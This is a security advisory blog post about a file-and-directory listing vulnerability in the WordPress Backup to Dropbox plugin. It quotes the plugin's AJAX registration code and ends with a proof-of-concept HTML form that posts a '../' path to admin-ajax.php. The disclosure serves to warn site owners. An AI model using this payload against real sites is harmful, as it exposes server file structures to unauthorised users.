Today we had somebody contact us asking if we had any insight in to why the plugin WordPress Backup to Dropbox was removed from the Plugin Directory (after seeing one of yesterday’s posts). Our guess on that would be that it has to do with the plugin no longer working, but while doing a quick look over the plugin we did find a vulnerability in it that allows anyone logged in to WordPress to view a list of files and directories in a directory on the server they specify.

The plugin makes the function backup_to_dropbox_file_tree() accessible to anyone logged in to WordPress through WordPress’ AJAX functionality:

376

add_action('wp_ajax_file_tree', 'backup_to_dropbox_file_tree');

That function will load up the file /Views/wpb2d-file-tree.php:

155
156
157
158
159

function backup_to_dropbox_file_tree()
{
    include 'Views/wpb2d-file-tree.php';
    die();
}

That file will list the files and directories located in specified directory on the server (as specified by the POST input “dir”).

Proof of Concept

The following proof of concept will return a listing of the files and directories in the root directory of the WordPress install, when logged in to WordPress. The contents of the resulting are hidden using “display: none” styling, so you either need to remove that styling or view the page’s source to see the results.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=file_tree" method="POST">
<input type="hidden" name="dir" value="../" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?